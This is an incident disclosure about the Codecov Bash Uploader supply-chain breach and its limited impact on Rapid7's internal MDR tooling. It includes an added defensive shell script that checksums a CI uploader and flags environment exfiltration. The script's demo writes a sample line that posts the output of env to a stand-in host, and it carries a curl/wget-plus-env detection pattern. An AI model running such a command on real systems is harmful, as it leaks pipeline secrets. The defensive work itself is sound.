Cybersecurity is Rapid7’s top priority, and when there is an incident that may pose a risk to our customers, we are transparent about it. We also believe that providing this level of transparency ultimately helps the security community better address potential pending threats and safeguard themselves from future attacks. With this in mind, we want to share an update concerning the security incident disclosed by Codecov and its potential impact on our company and customers, and how we managed the event.
On April 15, 2021, Codecov, a provider of code coverage solutions, announced a supply chain incident in which a malicious party gained access to Codecov’s Bash Uploader script and modified it, enabling the attacker to export data stored in environment variables on Codecov customers’ continuous integration (CI) systems to an attacker-controlled server. Codecov’s disclosure with more details is available at https://about.codecov.io/security-update/.
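The attack described above worked because CI pipelines routinely fetch a vendor script and execute it, so a modified copy runs with every secret the job has in its environment. The following POSIX shell guard is an added example, not code from Rapid7 or Codecov: it pins the uploader to a SHA-256 value recorded in the pipeline, refuses to run the script if the hash differs, and as a second layer flags any line that hands the output of `env` or `printenv` to `curl` or `wget`. The two scripts it checks are constructed samples, and the pinned hash is taken from the clean sample only for the demonstration; in a real pipeline it would come from the vendor's published checksum.

```shell
#!/bin/sh
# Added example (not Rapid7's or Codecov's code): gate a downloaded CI helper
# script on a pinned checksum and a coarse environment-exfiltration heuristic.

# Portable SHA-256 of a file: sha256sum on Linux, shasum on macOS/BSD.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_script FILE EXPECTED_SHA256 -> 0 if the file matches the pinned
# value, 1 otherwise. The expected value belongs in the pipeline config,
# not in the script being verified.
verify_script() {
    actual=$(sha256_of "$1")
    if [ "$actual" = "$2" ]; then
        return 0
    fi
    echo "checksum mismatch for $1: expected $2, got $actual" >&2
    return 1
}

# scan_for_env_exfil FILE -> 0 if clean, 1 if any line both invokes a
# network client (curl/wget) and reads the process environment
# (env, $(env), printenv). Heuristic only: it is meant to catch the shape of
# the incident above, not to replace the checksum.
scan_for_env_exfil() {
    grep -nE '(curl|wget)' "$1" \
        | grep -E 'printenv|(^|[^A-Za-z0-9_])env([^A-Za-z0-9_]|$)' >&2 \
        && return 1
    return 0
}

# guard_uploader FILE EXPECTED_SHA256 -> 0 only if both checks pass.
guard_uploader() {
    verify_script "$1" "$2" || return 1
    scan_for_env_exfil "$1" || return 1
    return 0
}

# Demonstration on two constructed scripts (sample content, not the real
# uploader). The pinned hash is derived from the clean sample here; a real
# pipeline would record the vendor's published checksum instead.
demo_dir=$(mktemp -d)
printf '#!/bin/sh\necho "uploading coverage report"\n' > "$demo_dir/clean.sh"
printf '#!/bin/sh\ncurl -d "$(env)" http://example.invalid/upload\n' > "$demo_dir/suspicious.sh"
pinned=$(sha256_of "$demo_dir/clean.sh")
for f in clean.sh suspicious.sh; do
    if guard_uploader "$demo_dir/$f" "$pinned"; then
        echo "$f: verified, safe to run"
    else
        echo "$f: BLOCKED"
    fi
done
rm -rf "$demo_dir"
```

In a pipeline the call would be `guard_uploader ./uploader.sh "$PINNED_SHA256" && sh ./uploader.sh`, with `PINNED_SHA256` stored alongside the pipeline definition and updated deliberately when the vendor publishes a new version. The checksum is the control that actually stops a modified script; the pattern scan only adds coverage for jobs that cannot pin, and it will not catch exfiltration written in a form it does not recognise.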
When we learned of this incident, we immediately kicked off our security incident response process. Our use of Codecov’s Bash Uploader script was limited: it was set up on a single CI server used to test and build some internal tooling for our Managed Detection and Response (MDR) service. We were not using Codecov on any CI server used for product code.
Like other Codecov customers, we have been actively investigating this incident in our environment, and after a thorough review and validation from a leading external cybersecurity forensics firm, we determined the following:
- A small subset of our source code repositories for internal tooling for our MDR service was accessed by an unauthorized party outside of Rapid7
- These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers
- No other corporate systems or production environments were accessed, and no unauthorized changes to these repositories were made
We have contacted the small subset of customers who may be impacted by this incident to ensure they take appropriate steps to mitigate any potential risk. Note: If you haven’t been contacted by us about this already, it is because you are not impacted by this incident. Through our investigation we have found no evidence of access to our Insight platform or products, nor access to any customer data sent through or stored in either.
We will update this notice if we learn new information that changes the scope of the impact described here. If you are a customer and have any questions or need further information, please contact your Account Team or email firstname.lastname@example.org.
We will also be sharing a blog post that covers some of the techniques we used when responding to this incident, in the hope that it will help others handle this incident and similar ones.